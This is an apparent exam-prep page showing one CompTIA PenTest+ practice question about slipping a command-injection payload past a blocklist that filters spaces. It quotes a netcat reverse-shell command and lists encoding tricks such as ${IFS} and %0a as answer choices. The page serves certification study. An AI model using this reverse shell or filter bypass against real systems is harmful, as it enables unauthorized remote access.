CompTIA PenTest+ Exam PT0-003 Question # 66 Topic 7 Discussion

CompTIA PenTest+ Exam PT0-003 Question # 66 Topic 7 Discussion

PT0-003 Exam Topic 7 Question 66 Discussion:
Question #: 66
Topic #: 7

A penetration tester is trying to bypass a command injection blocklist to exploit a remote code execution vulnerability. The tester uses the following command:

nc -e /bin/sh 10.10.10.16 4444

Which of the following would most likely bypass the filtered space character?


A.

${IFS}


B.

%0a


C.

+ *


D.

%20


Get Premium PT0-003 Questions

Contribute your Thoughts:


Chosen Answer:
This is a voting comment (?). It is better to Upvote an existing comment if you don't have anything to add.